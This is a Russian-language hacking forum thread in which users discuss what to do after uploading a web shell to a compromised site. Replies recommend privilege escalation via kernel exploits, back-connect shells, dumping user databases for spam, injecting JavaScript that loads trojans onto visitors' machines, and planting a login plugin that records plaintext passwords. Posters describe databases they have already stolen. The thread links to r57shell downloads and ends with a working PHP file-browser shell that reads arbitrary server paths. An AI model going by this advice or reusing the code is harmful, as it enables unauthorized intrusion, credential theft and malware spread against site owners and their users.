Залил шелл, что дальше ?

Залил на сайт шелл через уязвимость в форуме.
Дефейсить не интересно.
Можно как то поднять права выше, получить хостера ?
Что вообще можно получить с этого шела ?

 

вопрос: зачем залил: спортивный интерес или кровная месть???

если интерес: ну поройся там, сям, поищи инфу какую нить, залей еще чего-нить интересное, когда админ ету дырку заклеет, залезть опять, админ точно повесится...

месть? куси и кроши шоб ни кусочка не осталось, тока покоцаная главная страничка с надписью

" ЗДЕСЬ БЫЛ ВАСЯ "

З.Ы. тока лучше не тяни... обломают.

 

З.З.Ы. ну, инфа - самое наверное важное: номера, аси, пароли и прочая по@бень...

 

для начала глянь версию операционки, потом поищи сплойты под эту версию. Потом бекконнект тебе в руки и юзай сплойт. а вообще вот почитай

http://hackedpro.org/forum/showthread.php?t=7

 

uname -a выдаёт
FreeBSD voleri-a.*****.ru 6.2-PRERELEASE FreeBSD 6.2-PRERELEASE #0: Tue Oct 3 18:28:07 MSD 2006 [email protected]*****.ru:/usr/obj/usr/src/sys/work amd64
Система я так понял FreeBSD 6.2-PRERELEASE искал на неё сплоиты но не нашёл, есть только для 6.1 и ниже.
Базы данных форума и сайта я слил, потом буду расшифровывать.
Крушить ничего не хочу, хочется что нибудь полезного с этого поиметь.
А что такое бекконнект ?

 

На тачке открывается порт для подключения к которому ты и конеектишся. И дальше работаеш через консоль.

 

Ставь прокси))
Делай дамп баз! посмотри мож в них че интересное)) ну как минимум спам база уже будет!
Можеш в гланую страничку добавить Java Script который будет загружать и запускать троянца на комп жертв))

 

А откуда кстати можно хороший backconect слить??

 

в продолжение темы. А какой прокси посоветуете ставить, а то у меня таже ситуация. Нашел сервак, залил шел, базы скачал (5000 мейлов), че дальше делать не знаю, ну полазил там по остальным сайтом на этой машине и все.

 

в продолжение темы. А какой прокси посоветуете ставить, а то у меня та же ситуация. Нашел сервак, залил шел, базы скачал (5000 мейлов), че дальше делать не знаю, ну полазил там по остальным сайтом на этой машине и все.

 

если кодить умеешь - то за 5 минут к странице логининга дописывается плагин, который сохраняет пароли в открытом виде, затем проверяются эти пароли на юзерские аськи, мыла etc ))) (чтоб хеши не брутить) (и если прав на перехапись скриптов хватает)

 

3Proxy Статья

 

Не подскажешь где про это можно почитать ?
Да кстати может кто нибудь поделиться r57shell 1.31 а то rst.void закрыли и нескачаешь, если есть то лучше исправленный =)

 

http://rst.void.ru/download/r57shell.txt.gz
http://rst.void.ru/r57shell_create.php
А по мне лучше: http://www.security-teams.net/index.php?showtopic=3429

 

вот держи небольшой проводник:

PHP:

<?php
 if(!isset($_GET['dir']))
   $_GET['dir']='.';
   if(is_dir($_GET['dir']))
 {
  print "<body bgcolor=d0d0d0><table><tr><td align=center><b>[имя]</b></td><td align=center><b>[права]</b></td><td align=center><b>[размер]</b></td><tr>";
     $dira=opendir($_GET['dir']);
     while (false!==(($file = readdir($dira))))
     {  
     if($file=='.')
       continue;
      $fs="-";
       if(is_dir($file))////есле папка/////
            echo "<tr><td><a href=$SCRIPT_NAME?dir=".$_GET['dir']."/$file><font color=660000>$file</font></a></td><td align=center><br>";
          else 
        {
         echo "<tr><td><a href=$SCRIPT_NAME?dir=".$_GET['dir']."/$file><font color=006600>$file</font></a></td><td align=center>-<br>";
          $fs=filesize($_GET['dir']."/$file");
             if($fs!=0)
               {
                $ost=$fs%1024;
                $fs-=$ost;
                if($fs!=0)
                  $fs/=1024;
                else $fs=1;
                }
          }
          if(is_readable($file)) echo "r"; else echo "-";
          if(is_writable($file)) echo "w"; else echo "-";
          if(is_executable($file)) echo "x"; else echo "-";
           echo "</td><td align=center>$fs</td></tr>";            
        }
     }
     else 
     {
     print "<pre>";
     foreach(file($_GET['dir']) as $val)
     echo htmlspecialchars($val);
     print "</pre>";
     }
?> 


 

2GrAmOzEkA вот и ответ Permission denied!